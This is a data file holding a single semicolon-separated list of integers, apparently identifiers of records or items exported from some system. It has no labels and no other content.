95352;95353;95354;94740;94741;94742;94978;94979;94980;94982;94981;95355;95356;95372;95373;95444;95484;95576;95577;95952;96004;95953;96048;96036;96049;96050;96182;96285;96286;96339;96340;96341;96342;96457;96456;96567;96568;96569;96613;96633;96664;96810;96811;96812;96929;96813;96962;97026;97027;97028;97134;97194;97330;97305;97331;97389;97390;97391;97472;97558;97527;97528;97611;97612;97613;97756;97836;97795;97837;97949;97951;97950;97952;97953;97954;97955;97956;97957;97959;97958;97960;97961;99040;97962;99316;99041;99317;99379;99380;99381;99382;99383;99384;99481;99482;99483;99536;99538;99537;99539;99540;99541;100065;100066;100068;100067;100174;100326;100175;100327;100329;100328;100358;100428;100359;100429;100430;100555;100557;100556;100558;100770;100815;100935;100936;100937;100938;100965;101005;101091;101119;101120;101235;101236;101237;101488;101489;101823;101906;101907;102020;102735;102734;102736;102737;102738;102739;102741;102740;102743;102742;102744;102745;102746;102747;102748;102749;102750;102751;102752;102753;102754;102755;102756;102757;102758;102759;102760;102761;102762;102878;102763;102503;102504;102764;102765;102766;102505;102767;102768;102769;102879;102549;102881;102880;102883;102882;102884;102885;103035;103196;103145;103144;103230;103362;103384;103385;103387;103386;103517;103573;103574;103605;103606;103706;103790;103707;103826;103881;103946;104106;104053;104054;104217;104218;104256;104257;104396;104583;104584;104675;104789;104790;104817;104818;105057;105056;105059;105058;105060;105061;105062;105114;105588;105589;105556;105590;105591;105592;105593;105594;105658;106107;106108;106233;106172;106234;106317;106354;106353;106535;106355;106356;106566;106567;107074;107075;107269;107271;107270;107272;107273;107275;107274;108339;108338;108340;108341;108342;108343;108344;108383;108384;108489;108660;108898;108899;108900;109370;109371;109372;109373;109374;109375;109376;109377;109378;109379;110235;110236;110237;109525;109380;110238;109526;110239;109527;110240;109528;110241;110242;110243;109529;109530;110244;110245;109655;109656;110246;110247;109923;110249;110248;109814;109815;109958;109959;109961;109960;109962;109963;109965;109964;109966;110203;110204;110205;110206;110296;110298;110297;110569;110536;110645;110646;110648;110647;110649;110650;110652;110651;110663;110905;110906;110907;110908;111074;111075;111013;111076;111077;111079;111078;111339;111355;111340;111356;111613;111341;111615;111614;111616;111617;111703;111704;112021;112020;112022;112163;112164;112165;118982;117485;117486;117826;117827;117829;117828;117830;117831;117832;117833;118018;117834;118019;118020;118021;118022;118117;118118;118156;118311;118312;118405;118406;118983;118984;119690;118985;119691;118986;118987;118988;118989;118991;118990;118992;118993;118994;119692;118996;118995;118997;118998;118999;119000;119001;119002;119003;119004;119005;119044;119045;118838;118837;119046;119047;119006;119048;119049;119050;119051;119661;119662;119663;119664;119665;119479;119666;119873;119874;119754;119791;120956;121192;121216;121371;121545;121546;121548;121547;121550;121549;121551;122061;122062;122719;122063;122064;122065;122350;122351;122352;122353;122450;122451;122452;122618;122761;122619;122951;122952;122953;122954;122955;123015;123014;123092;124414;123558;123559;123560;123561;124032;123562;124033;124034;124093;124035;124202;124201;124241;124203;124242;124415;124416;124871;124872;124873;125166;125167;125168;125169;125170;125171;125172;125315;125316;125552;125553;125554;125801;125802;126074;125803;126006;126007;126008;126075;126076;126219;126385;126386;126387;126388;126389;126479;126480;126649;126650;126651;126790;126791;126792;126989;126990;126991;126992;126993;127469;127470;127471;127472;127473;127474;135312;128330;128331;128332;128651;128333;128335;128334;128337;128336;128338;128339;128340;128341;128342;128343;128344;128345;128346;128347;128348;128349;128350;128351;128352;129015;128353;128354;128355;128357;128356;128359;128358;128360;128361;128363;128362;128364;128365;128366;128367;128368;128369;128370;128371;128372;128373;128374;128375;128376;128377;128378;129016;128379;128380;128381;128382;128383;128384;128385;128386;128387;128389;128388;128391;128390;128392;129017;127918;127919;129018;129019;129021;129020;129022;128976;129023;128977;129024;129538;129393;129471;129472;129473;130176;130128;130129;130177;130178;130179;130180;130181;130434;130435;130436;130472;130473;130474;130976;130977;131032;130978;131033;131034;131569;131570;131571;131572;131779;132398;131958;132399;131959;132400;132401;132402;132404;132403;132405;132939;132873;133097;133099;133098;133100;133309;133311;133310;133312;133313;133314;133315;133317;133316;133507;133442;134087;133508;133767;133624;133768;133769;133770;133771;133872;134088;134089;134090;134091;134121;134122;134123;134237;134238;134239;134385;134386;134453;134900;134901;134902;134903;134904;134905;134907;134908;134909;134910;134906;134912;134911;134913;134914;136771;135313;135314;135315;135317;135316;135319;135318;135320;135322;135321;135323;135324;135326;135325;135327;135328;135330;135329;135331;135332;135334;135333;135335;135336;135337;135338;135339;135340;135342;135341;135343;135344;135346;135345;135348;135347;135349;135350;135351;135352;135353;135355;135354;135356;135357;135358;135359;135360;135361;135362;136015;136016;136017;136194;136018;136195;136019;136196;136197;136198;136020;136199;136200;136773;136772;136775;136774;136776;136777;137005;137006;137149;137007;137150;137151;137152;137281;137336;137337;137338;137370;137415;137729;137730;137761;137762;137763;138378;138377;138501;139422;139416;139423;139235;139236;139417;139420;139415;139424;139418;139419;139421;140123;140119;140583;140585;140584;141613;141625;141611;141585;143283;141630;141600;141617;141597;143285;141593;141631;141635;141614;141608;141601;141623;143286;141605;141604;141634;141586;141589;141602;141591;141595;141594;141579;141584;141633;143284;141598;141583;141624;141596;141629;141587;141590;141632;141612;141599;141616;141588;141609;141622;143287;141610;141626;141578;141607;141592;143288;141618;141636;142647;142609;141619;142600;142608;142599;142651;142650;142604;142605;142602;142649;142646;142601;142598;142603;142606;142607;142648;142645;142644;143057;143122;143052;143046;143048;143050;143056;143047;143049;143051;143113;143055;143910;144004;145444;146880;143114;146881;144972;144549;144370;144974;144971;144973;144547;146883;145037;145038;145439;145441;145519;146099;146100;146098;146097;146315;149505;146882;146879;146958;148557;147884;147883;147885;148184;148185;152361;148426;148425;148885;148745;148882;149207;149206;149208;149205;150771;150774;150773;150765;150767;150770;150764;150769;150772;150762;150763;151448;151614;151674;151979;151987;152497;152360;152663;152666;152664;152910;152909;152973;152970;152971;152976;153473;153472;155551;155545;153767;155547;155553;155543;155552;155541;155549;155546;155548;155550;155538;155539;155540;155759;155757;155761;155821;155942;155863;156241;156242;156240;156460;156820;156821;156791;157118;157065;157064;157138;157294;157452;157453;158081;158083;158436;158438;158440;158444;130262;158439;44340;80224;80223;87052;80357;87053;87054;80225;80358;29722;93244;31299;80221;80226;14640;65984;65983;40821;47588;63558;63559;63560;73270;76459;77004;40820;20348;22876;20347;17230;17231;10037;11755;10797;11640;14314;14316;14317;14315;10652;10651;10038;12096;50512;15710;33532;10308;10552;11721;10040;11722;10041;33279;10042;11723;10043;18356;40983;65739;101086;101087;59837;101088;105256;101089;101090;104670;104996;107072;104997;105084;105085;104998;104999;104847;105000;104669;128283;128149;134563;134891;105001;105002;134890;10919;18528;10044;62076;62075;104740;52016;12084;139913;22094;11518;17584;55994;20162;20160;15617;15620;15618;15621;15622;20961;16320;16319;13849;18131;12281;66518;65740;11011;17772;17773;17774;17775;17776;17777;69481;71173;77052;77053;83766;91192;91854;91855;76127;83087;84193;84726;84727;85895;93480;137557;48944;17778;48945;48946;48947;48948;48949;48950;48951;48952;48953;48954;48955;48956;48957;48958;48959;48960;48961;48962;48963;48964;48965;48966;48967;17779;48968;48969;55385;48971;17780;48972;48973;48974;17781;48975;48976;48977;48978;48979;48980;48981;48982;48983;48984;48985;48986;48987;48988;48989;48990;48991;48992;48993;17782;48994;48998;48995;71431;48996;48997;48999;49000;49001;49002;49003;49005;49004;71432;49006;49007;49008;49009;49011;49010;49012;49013;49014;69949;70137;49015;71433;66697;49016;69335;49017;49018;49019;49020;49021;49022;49023;49024;49025;49026;49027;49028;70170;68961;69303;69913;49029;49030;49031;49032;49033;49034;49035;49036;70123;49037;69923;49038;49039;49040;49041;49042;49043;49044;49045;49046;49047;49048;49049;49050;49051;71434;49052;49053;49054;49055;70164;56045;49056;49647;17783;17784;49648;17785;52586;69954;70095;56313;56314;56315;56316;56317;56318;56319;56320;56321;56631;79271;79272;79273;66698;58831;58566;58567;58568;58569;58570;58571;58572;58573;58574;58621;71435;69914;59716;59857;59858;70024;69425;71436;62370;62371;67203;62372;62373;67204;62374;62375;62376;62760;62710;69135;70125;70096;70124;70127;69426;65885;65886;65887;65888;65889;65890;65891;65931;67218;69924;70078;66861;69789;66699;66700;69921;69076;70076;69079;69082;69103;69856;69376;69377;69378;69379;130060;130061;69553;70314;70315;70316;70317;70318;70319;70320;70321;70322;70312;70313;70323;71437;70474;70493;71438;70784;70914;71995;72183;72184;72185;72668;72705;72724;73018;73210;73211;73269;73340;73341;73342;73343;73344;73345;73346;73347;73533;73915;73916;74015;74016;74241;88988;88989;88990;88991;76312;77153;77154;77759;78028;78029;78030;78031;78032;78033;77984;78034;78035;78036;78037;78693;78240;78750;79218;79690;81911;83876;81980;86675;81423;81594;81595;81596;92412;81421;82498;83528;81972;90525;90526;82584;82585;82571;82574;82575;82572;82573;82568;82569;82570;82852;108954;108955;83054;130062;83767;130063;84287;85685;85126;85124;85125;85255;130064;86246;86247;86248;86249;86250;92457;88102;93528;93529;93530;93531;86914;86915;86916;86950;86951;130013;87504;87819;97469;88103;91962;88592;88488;130065;88717;130014;88713;89051;89690;89783;89784;89785;90066;90527;90353;90354;90355;90356;68997;93562;90307;90308;90357;90310;90311;90358;90359;90766;93108;91960;90861;90862;90893;90714;91759;91760;130015;91130;130066;91946;91321;91338;91730;91761;92630;92948;93563;93122;93123;93192;93193;93048;93347;94108;93736;93737;94054;93738;93866;131164;131165;94252;108956;108957;130763;130971;130764;130765;94762;94763;130761;130762;93898;93899;130766;130767;130597;95257;95256;94354;94109;129817;129818;94070;129819;94469;94291;94680;95538;96047;95479;102995;99400;97211;99266;99371;99372;103783;97991;97992;97943;97944;97945;97946;99026;99027;99028;99029;99031;99032;99033;100423;103510;103509;99471;99472;99473;99665;99666;99667;99668;102360;102361;102362;102363;99687;99688;100424;99985;130093;103511;100425;100426;99981;100416;103512;101264;100993;100838;100840;102202;101267;101298;101269;101268;101528;101529;102018;131079;131080;131131;131187;131188;131393;131394;131395;131396;102497;102498;102499;130094;102364;102778;102779;129820;103113;103049;129821;103459;103702;103668;103565;103693;131192;103694;103695;131327;103669;103675;103676;103566;103670;103671;103567;103672;103817;103819;103856;104127;104177;104480;104461;104460;104533;130067;130095;104718;104661;104662;104663;105257;105112;106400;106401;106630;107095;106484;107091;133861;107150;129781;108406;108404;132697;132698;132680;132052;109087;109088;131166;131400;131130;131399;131321;131325;131326;124196;108880;108881;108882;131397;131398;125031;134712;108720;108721;131729;132078;131951;131322;131323;108722;108723;132039;131324;132033;132077;131126;108724;135922;133044;109404;132043;132042;109393;109401;109400;110399;109402;134981;133265;109728;110564;110565;110566;131703;110686;130016;124172;130068;130096;130017;110535;110567;110687;138346;138435;138347;138436;138348;138437;135198;110688;138438;138349;138350;138439;138351;138352;138353;111211;134226;130097;130098;123521;112217;133226;112218;112288;112219;123415;112289;123515;140653;122249;117943;117944;117945;132041;117946;117947;117948;117949;117950;132074;132104;117951;117952;132048;132049;132044;117953;123788;117954;133472;133473;117955;117956;133089;127893;144504;130069;117917;145537;130018;133267;134946;128877;134947;118462;118461;118821;118822;152699;119844;121248;131727;131728;126103;129948;124773;123789;124774;126343;126104;124060;129822;121395;126118;129947;130023;126102;139801;133958;139802;122483;136978;131699;125775;132318;126509;126599;122751;126073;132342;132244;132414;132053;131700;132245;132055;125390;132246;126477;127111;134948;138354;127110;131778;132100;138355;125391;124589;123790;124277;123791;127916;127098;134951;127099;123792;129499;127913;126507;127912;127917;130092;128526;129812;128421;123793;132723;134713;123794;127049;123795;127050;134894;128113;128114;128615;128051;124061;124325;126119;126822;124326;126100;126101;126105;124334;138440;124331;124332;124333;137072;137073;139324;137234;134213;137235;136768;126341;136972;136973;136829;128063;138380;128064;126823;125256;139806;137074;137075;136970;136971;126632;126916;125341;125032;126310;129823;126311;129980;129981;129945;131697;132720;136481;132241;133726;128769;128684;132678;139666;130768;130917;130972;130916;130974;128058;128418;128281;129946;130975;130973;128079;131698;132719;128419;136482;125679;132679;126342;126446;136483;125778;132242;125776;126344;134173;134227;127044;126005;140220;126004;147766;147878;126639;126340;126643;126640;126701;128685;126645;126644;128053;128034;127121;126642;128054;126646;126629;133043;127118;143157;127123;128532;128081;137052;128546;127900;128112;147761;128533;142497;137243;128120;129291;131946;130174;128119;131427;132855;128325;128550;128683;132772;128760;128547;128757;135674;136712;128761;129558;129536;129592;134889;129778;129591;129779;129713;130021;130022;129586;129537;134562;129531;129816;129827;129733;129530;129588;129584;129732;129826;129780;129694;129695;129532;129943;139850;129533;134108;129777;133850;133851;133841;133842;138024;130090;138025;130272;129815;129813;130367;130397;130594;130213;129810;135897;130457;129824;129944;134383;129811;129809;129942;129850;134448;135291;131183;134449;133046;135294;135295;134450;130398;129814;140191;140190;130399;130210;130211;130368;130207;132750;132751;131020;129982;130593;130464;130624;130258;130259;130208;151459;131231;131075;131076;131428;132718;131230;131024;131288;136719;131228;131229;139068;131739;135289;134115;131403;147653;131232;140632;132721;141500;133000;133001;133864;133261;133403;133408;134447;133409;147650;135407;147732;147651;133405;133720;133406;133721;133603;133722;142018;140656;140721;133604;140631;134107;133960;133961;134565;134566;134233;134234;134230;134231;134567;134232;134413;134415;134414;134224;134417;134219;134229;134326;134236;140203;134568;134443;134235;147764;147654;148021;151483;83871;78827;78828;86104;82429;86105;138881;143231;143219;139800;143234;146084;148951;150073;148091;148097;148217;148216;148096;148221;148220;134164;153895;150026;150027;137085;148646;152176;149448;146581;148450;144945;139411;150807;142589;148655;144950;148451;154928;150811;139543;151441;149812;148223;148222;136588;136589;136830;136831;138375;149526;149525;155370;155369;152024;138892;152025;138893;137558;137559;149301;149314;149302;149313;149304;149303;154726;154725;149877;148306;136916;136917;150996;155445;155444;149312;149311;152673;152674;149851;149852;137659;137660;137661;137662;137135;137136;152670;152671;136914;138894;136915;139064;138895;154828;154829;149354;149355;155024;155025;149470;149471;141830;141831;150997;155676;156946;155677;145513;139425;139517;139577;137840;152974;140202;157877;152936;145692;152961;151019;143155;158563;142493;151487;138016;138017;148137;156884;147765;139035;139927;153258;141499;142908;139228;142909;149469;149467;139792;148694;145263;154931;154930;154929;148970;148968;148969;148643;139605;135859;146214;139229;149468;138373;144503;139805;139539;140098;151216;139804;139516;139468;139542;145793;140099;139540;140100;139004;139426;145509;146056;139470;139576;137850;140101;139803;140102;139469;139007;143424;152540;147763;134053;134054;134444;140402;147146;140273;135012;140212;153943;141352;145553;145554;145555;149844;149842;149843;149847;142366;148101;153563;153560;137629;144197;153561;148092;153398;152813;141361;158651;148099;152527;152390;154851;138446;142213;149352;155447;149846;148381;149845;136621;145250;142211;154723;141358;149325;136827;138040;136612;136614;136615;147762;136700;142143;149371;152749;136587;137406;137564;138376;155451;155315;149298;146203;154853;142363;152750;136622;152410;136918;152485;136669;150059;140221;149465;149209;149370;142364;155450;155449;142214;136891;140218;152121;152122;142425;142424;142423;148836;141832;149718;146058;146057;150058;149454;137835;149979;137836;155733;155734;142496;146213;154343;139230;141116;141117;141231;141230;146264;139037;139614;137147;137280;139926;138147;148296;141113;137901;137903;137902;142959;141114;148106;152658;148104;148102;141172;148107;143154;141193;148100;142053;149789;141397;137148;153554;138094;141266;138092;142891;141373;141372;151375;142958;148427;141371;140222;151374;148327;140223;141398;138211;148103;137182;141368;141369;140793;140799;153209;153207;148250;140111;153204;134451;147816;153203;142592;153208;152131;148095;153154;153153;143490;137143;147649;153206;133401;146480;146481;141351;158584;153950;146618;139604;153947;149455;151662;135902;133651;142593;135971;154878;141354;143220;140505;150862;150861;140271;144279;140270;140219;141437;153224;141461;149299;149300;138152;151020;140097;149957;158207;158208;149368;148098;137203;156947;140185;158887;137184;157903;149310;152877;158559;146805;146804;140186;139922;149719;140131;152529;140189;139665;155019;134707;134711;152987;137361;137332;142473;142472;154197;148124;138587;152213;139029;153257;140272;146266;139664;139067;138019;141467;137852;139747;146268;146267;138327;152212;140216;140452;148652;148712;154932;151661;153556;153562;153549;150141;154348;153555;149327;149363;139232;142033;149330;141370;151915;150052;149364;145706;150992;147963;147964;147962;148105;151132;150990;145707;145708;151467;146307;153551;149365;151133;150050;149879;145501;151916;149362;150339;150051;147733;141438;136671;147758;134445;140403;147147;136748;157361;155300;152812;148320;137144;137145;146211;146212;157157;146202;141170;141171;137141;137142;136623;158586;141357;145265;141356;137654;137655;137656;137630;137631;137407;137408;152130;142824;133530;154438;137856;138359;149849;153944;139545;154234;154233;142495;133404;143150;140213;139413;137134;146450;135766;141115;147759;151154;142659;143217;142995;148978;147622;148959;149880;151187;145547;145422;148962;148447;146216;148957;149329;142494;145552;148954;142490;147756;149328;147760;145551;142365;142660;147877;145556;143232;147652;143216;143165;142597;142373;147876;145557;141192;146594;142661;139325;137241;150502;133407;137185;138015;137649;138018;139799;150849;150847;150848;139600;140456;143475;140268;139575;140269;139599;142879;142880;150279;136120;151013;150506;150246;139582;139597;144929;141353;142590;139544;142503;138148;141083;137183;138524;139327;139036;135858;144196;134446;140404;143153;149809;149450;141119;148093;138876;148090;148094;138361;148448;142890;137851;153219;147893;141460;153694;17786;17787;71924;71925;71926;72725;73755;71153;78557;72458;72487;72559;70457;72485;82586;72140;82587;72141;72338;72510;70894;72460;73827;73455;73456;73457;72509;76882;78064;70399;76588;76970;78690;78691;76865;77411;79146;73027;77682;77681;73458;74036;76972;74443;79744;77051;82588;82589;76790;77222;83733;82473;77729;82590;79359;82666;78918;78919;83734;81912;81913;91426;87820;87821;87847;89083;78824;93113;78825;78858;77284;73828;73829;73436;79249;79250;76971;83904;76968;76969;76881;79577;78894;78737;79625;79667;79803;83183;80460;17788;17789;83782;17790;69985;17791;68991;69134;17792;17795;99233;99234;74010;10682;10045;38152;10561;76126;91427;69912;149982;69853;33942;33943;33944;33945;11556;122370;11014;65941;71464;66023;61518;76491;140294;78676;81671;82270;81978;85541;87894;86302;85266;85267;93382;88100;95951;100790;97226;110563;54954;59819;59820;59821;54953;88595;104479;91731;88596;154422;63644;69138;149502;76128;107004;131952;91963;151442;44945;44914;59227;61514;64555;42796;81574;91964;61515;133304;11012;156945;10545;155349;17793;70940;32131;32130;69950;69952;69953;69951;58512;70136;70089;70090;70092;70091;76121;77987;79668;80283;81546;93939;90312;99706;77968;83466;79124;85449;101357;110518;133078;142662;112019;69948;23938;10046;143384;128616;133723;152532;69075;73300;69074;128052;101265;103193;94470;69922;10970;10971;68960;12023;10700;10387;138362;11689;129590;89033;96802;78387;61574;78388;61575;61577;61576;76346;66202;66762;74147;74146;73736;47864;17794;61492;67217;71430;69802;133305;69801;69102;11791;84500;138761;70073;84501;97470;97471;72728;76129;87954;80302;60107;62182;86912;72727;69788;73754;10754;66696;76130;69059;69058;16201;16202;86913;87506;86152;91342;152530;91343;86153;101531;86192;91344;93400;100323;104462;107259;100843;86193;67247;67248;70166;82701;70167;82740;67244;67245;67246;90590;118088;122347;130503;118145;70258;99934;90591;83877;64789;69057;69056;66860;62181;87849;112121;112122;69925;69926;138882;69133;99935;88593;88594;143233;69078;73301;69077;148264;122115;148445;156567;155301;156566;109118;105161;129983;10972;129984;69825;77760;86151;79584;81407;128176;79585;81952;81973;79581;83768;83769;72180;79582;126586;76131;69047;70079;69048;126587;69049;69046;69050;78624;83770;97021;83771;83731;90539;90540;90541;83773;83772;86123;76132;69019;76125;72181;78596;81408;85649;88527;128177;85650;85651;78625;92045;86544;97326;81974;81953;72245;72182;60139;60140;60138;88528;103112;70197;70198;82702;70196;80282;78770;78768;93109;78769;78767;88589;69919;78766;70077;70088;91961;70169;102978;56485;56484;58004;141084;11013;129969;129970;129971;25906;42960;93478;129972;93479;25550;25549;55568;64437;69855;69854;71841;71840;71839;69132;71838;69130;69131;101816;101817;96907;96772;96908;119888;130173;70122;119287;69081;69080;69469;69495;69468;19559;69447;33946;58950;15942;13856;16245;30123;33169;33947;11138;139082;33201;65952;55653;62777;65950;65949;65951;126053;153176;153175;151484;154869;79640;79641;146935;55474;55473;79639;55927;10942;142019;55926;48275;42961;24742;25682;58563;40876;58562;40614;76261;142020;74025;74026;76916;81316;78893;103467;105373;110904;110903;121472;118463;125258;149878;138212;140790;132397;150866;155584;73205;62308;73204;40615;40616;69128;69129;69136;56392;59018;59465;96630;51663;51664;154777;59017;62310;62309;11892;126466;140798;150865;142894;130347;124000;148182;124001;128304;132103;132102;121386;140192;52546;52547;52545;121387;137001;137000;137002;156614;132752;92038;137003;92039;150791;152046;154423;67193;38663;148403;12301;134975;140758;149481;158566;130592;59310;63339;158567;76571;70741;63325;76771;79745;83163;83763;85242;85661;70740;87012;87373;91352;91885;93608;92723;95659;95539;96778;96928;97525;97948;99377;100104;101205;102526;103927;103381;104174;105083;105370;105617;108886;108887;109725;110265;110779;111378;118856;111789;119148;125549;148674;76770;58810;58809;58209;58749;56282;14626;16477;15462;109403;76943;65720;111517;35087;34729;36075;35009;39437;36131;45437;46706;51125;49712;51935;55905;59726;65668;66308;79388;81147;83352;106610;93897;39436;29830;148647;46172;74039;43400;11277;22409;22365;21641;26011;18165;21167;21335;16318;38183;18219;11399;21215;19392;72427;27600;158092;158059;157338;158672;158690;155715;155841;155630;155633;155586;155587;155628;155629;154965;153976;153977;153978;153981;153890;155661;155631;76260;76258;76257;156102;76259;21744;15828;10047;33269;19693;19692;34992;19551;29829;40551;149644;149510;130456;129979;100387;11073;11190;59400;59402;59401;157905;33275;20214;149307;150962;149308;57800;57802;81439;140693;140694;140695;140696;57799;57801;20220;18255;10581;42340;99731;40667;66404;59715;64689;66407;66408;130263;46705;42339;24283;72090;39790;48340;51955;53297;55512;55513;72091;55553;55542;57362;58388;74190;63689;64246;63690;66526;65928;70915;78480;79859;82780;85745;86948;91102;91677;93245;99669;103194;109017;117480;139918;122236;122535;125880;129388;132019;134765;135593;138573;153433;148039;68929;72092;68881;55514;72093;24278;24279;23781;19393;99584;99585;99586;99587;20131;17983;18029;20130;14183;18643;25369;131286;52457;10612;121036;21205;58650;73611;20889;25215;21917;40418;20827;17985;10048;11567;73610;19305;125782;126988;126050;58230;58952;58951;126953;11980;10746;17997;11879;125777;22308;34693;100161;36036;77390;36217;53576;53575;71213;69804;77030;99986;124281;124330;136178;128548;110771;106947;106948;106949;123008;139205;146869;149439;152864;124004;154244;153087;53574;62356;11724;20292;44135;16275;17597;15506;17306;31137;31859;11524;33789;15530;19511;20984;18101;11564;21240;15531;18083;38879;30132;35765;65789;70656;72661;72662;90765;59243;25494;72671;72660;62941;45435;62942;48382;51923;63642;111967;136945;45434;51922;10049;11725;11611;76190;18620;12102;10675;10676;11613;11281;76189;12097;18540;58409;17647;17273;38952;122599;122648;87597;159113;72459;11368;12060;11687;19236;10815;32318;110772;125477;138553;67175;67176;45590;59327;77158;110773;123687;59326;23741;30051;12271;51816;10924;26912;26913;10050;11726;58989;58990;45043;32442;22231;22296;42353;42371;17260;17998;21187;17227;42878;15442;17999;19945;36183;29727;31131;31730;33577;34385;42468;45554;47683;50844;56007;65970;71977;73734;76936;77149;79580;84149;79804;11754;15900;27608;47716;16141;24901;11199;31646;11756;15860;23775;21119;19756;17255;20137;29802;14665;17256;11940;14318;24003;18563;10051;11947;25758;11385;14313;10922;12265;12212;11970;12240;11384;18097;14283;14284;14285;15722;14220;14286;14287;14288;14289;24263;14290;14291;16000;10465;10402;11727;108952;108953;110287;152356;61446;19391;12012;28330;109596;140633;15819;17208;57336;11196;66238;44319;12266;19679;44657;43403;18118;19553;19554;18119;18117;72741;72742;11748;10368;25214;14639;54841;91822;106757;137233;46865;46866;23642;32317;10052;62369;70455;70456;76110;84020;84826;69800;76111;77571;82824;84021;84827;86002;87764;87765;94898;94899;103252;103253;101161;101162;108588;108589;126635;126636;138332;138333;134166;134167;143553;143483;143485;144811;147892;147891;147890;147889;151352;151458;151457;151455;151456;157142;157141;157423;157424;157245;157246;157189;157190;23935;23936;23937;30153;40662;34195;76112;33763;62629;34056;39007;43172;49120;51841;58293;76113;79245;84022;84828;91335;91336;46766;50451;53547;56928;59904;62701;71519;76114;59905;76115;51840;59644;60098;24699;25905;28227;33128;34475;36216;42044;46173;70454;103254;101163;143552;143484;144810;91337;22416;22016;11896;22017;10871;86653;22417;22447;91824;15486;76116;55690;11182;11180;122583;11616;10736;10583;11798;11476;11477;11446;18012;18016;16478;11728;40353;51394;82084;101031;101032;101033;101065;101092;101121;101173;101208;101174;101175;82085;101209;101210;101211;101238;101239;101274;101275;101318;101319;101320;82086;101321;101376;101377;101378;101535;101536;101552;101553;101774;101775;82087;101791;101792;101824;101856;101908;101909;101935;101936;101937;101960;82088;101982;102039;102040;102041;102042;102043;102044;102085;102096;102220;82089;102368;102437;102438;102439;102440;102441;102481;102482;102594;82090;102595;102596;102597;102628;102784;102785;102786;102787;102788;102789;82091;102804;102805;102886;102806;102823;102824;102843;102844;102845;102887;82092;102888;102889;102890;102891;102923;102924;102925;102961;102926;102962;82093;102982;103036;103092;103093;103094;103095;103197;103257;103258;103363;82094;103330;103388;103389;103390;103391;103427;103428;103429;103430;103431;82095;103460;103469;103470;103471;103472;103518;103519;103575;103576;103577;82096;103607;103682;103683;103708;103709;103710;103711;103712;103713;103714;82097;103756;103791;104055;103858;103947;103948;103949;103988;103989;82098;103990;103991;104056;104133;104219;104184;104185;104186;104220;104221;104299;104300;104301;104335;104336;104337;104338;104481;104364;104397;82099;104398;104399;104412;104413;104438;104439;104440;104464;104501;104502;82100;104534;104563;104585;104676;104677;104678;104679;104680;104681;104682;82101;104683;104708;104709;104720;104721;104744;104745;104746;104747;104748;82102;104749;104750;104751;104791;104936;104937;104938;104939;105009;105115;82103;105116;105117;105118;105168;105169;105193;105194;105325;105326;105327;82104;105328;105360;105378;105394;105395;105396;105423;105424;105425;105426;82105;105427;105428;105429;105465;105488;105494;105495;105496;105518;105557;82106;105621;105659;105622;105660;105661;105662;105701;105702;105703;105734;82107;105753;105797;105798;106075;106054;106055;106173;106174;106175;106205;82108;106206;106207;106208;106209;106210;106211;106318;106407;106408;106409;82109;106410;106411;106463;106464;106508;106536;106589;106590;106591;106592;82110;106633;106659;106696;106697;106722;106723;106724;106725;106779;106780;82111;106781;106808;106809;106819;106851;106872;106873;106904;106953;106954;82112;106981;106982;106983;106984;106985;107076;107104;107105;107133;107118;82113;107134;107151;107152;107242;107276;107277;107278;108415;108385;108416;82114;108522;108567;108568;108569;108604;108605;108606;108608;108609;82115;108661;108662;108692;108693;108694;108695;108726;108727;108728;108729;82116;108764;108765;108766;108767;108768;108769;108770;108788;108814;108815;82117;108901;108902;108903;108904;109062;109043;109044;109045;109063;109064;82118;109089;109090;109091;109148;109149;109187;109188;109217;109283;109284;82119;109327;109328;109346;109347;109348;109381;109407;109408;109409;109531;82120;109584;109585;109586;109657;109734;109735;109736;109737;109738;109872;82121;109924;110055;110158;110159;110160;110161;110162;110163;110164;110250;82122;110312;110313;110314;110696;110664;110697;110724;110725;82123;110726;110727;110728;110785;110786;110814;110815;110816;110817;110818;82124;110819;110840;110909;110926;110927;110945;110946;110947;110948;111046;82125;111080;111081;111082;111165;111166;111083;111084;111085;111086;111111;82126;111167;111168;111169;111170;111171;111172;111221;111222;111223;111311;82127;111312;111313;111314;111315;111357;111358;111359;111388;111389;111390;82128;111391;111392;111393;111394;111467;111519;111520;111533;111554;111555;82129;111556;112047;111618;111651;111762;111705;111763;111764;111765;111982;82130;111983;111984;112048;112049;112050;112065;112125;112126;112127;112166;82131;112167;112168;112184;112195;112196;112197;112225;112226;112227;112228;82132;112229;112230;112231;117349;117295;117296;117350;117351;117366;117367;82133;117432;117433;117434;117464;117487;117501;117502;117593;117609;117610;82134;117618;117619;117620;117640;33815;117641;117642;117643;117673;117711;117712;82135;117713;117714;117715;117810;117811;117835;117836;117837;117889;82136;117907;117908;82137;118070;118096;118119;118120;118157;118214;118215;82138;118239;118240;118313;118364;118407;118468;118469;118470;118471;118503;82139;118504;118577;118578;118596;118733;118597;118735;118734;118753;118806;118807;82140;118839;118808;118888;118889;118891;118890;118892;118938;119052;82141;119039;119053;119054;119101;119100;119102;119103;119104;119151;119152;82142;119105;119119;119120;119121;119122;119123;119153;119266;119267;82143;119310;82144;119289;119311;119312;119560;119425;119667;119693;119694;119695;82145;119729;119816;119730;119847;119848;119849;119875;119876;119877;119878;119889;82146;119890;119941;119942;119957;120958;120957;120959;120960;120961;120962;82147;121055;120988;121071;121133;121193;121233;121313;121315;121314;82148;121316;121372;121397;121398;121399;121423;121424;121436;121437;121481;121480;121482;82149;121483;121517;121518;121552;121622;121553;121554;121555;121556;82150;121623;121624;121625;122036;121626;121627;122066;122037;122038;122067;82151;122097;122098;122099;122100;122101;122195;122196;122262;122263;122264;82152;122265;122266;122267;122318;122319;122320;122404;122405;122430;122431;82153;122453;122454;122490;122491;122511;122512;122547;122513;122514;122515;82154;82155;122548;122549;122550;122603;122604;122620;122720;122762;122721;82156;122824;122825;122826;122827;122828;122829;122928;122879;122929;122930;122931;82157;122956;122932;123017;123016;123018;123019;123093;123094;123095;123096;82158;123135;123421;123420;123470;123471;123522;123523;123524;123525;123526;82159;123527;123528;123529;123563;123564;123565;123566;123567;123689;123690;82160;123798;123832;123833;123834;124036;123959;124065;124094;124204;124217;82161;124218;124243;124282;124283;124306;124307;124339;124340;124341;124342;82162;124343;124417;124595;124596;124463;124597;124598;124656;124657;124658;82163;124659;124720;124777;124778;124874;125093;124875;125174;125173;125175;82164;125266;125267;125268;125269;125270;125296;125297;125317;125298;82165;125478;82166;125407;125374;125409;125408;125410;125411;125412;125413;125479;125555;82298;125606;125644;125607;125740;125682;125741;125836;125837;125926;82299;125927;125956;125957;125928;125958;126009;126010;126011;126054;126077;126078;126079;82300;126126;126220;126222;126221;126223;126247;126248;126347;126348;126349;82301;126350;126481;126390;126482;126511;126512;126605;126513;82479;126606;126607;126528;126652;126793;126653;126833;126832;126834;126835;82593;126836;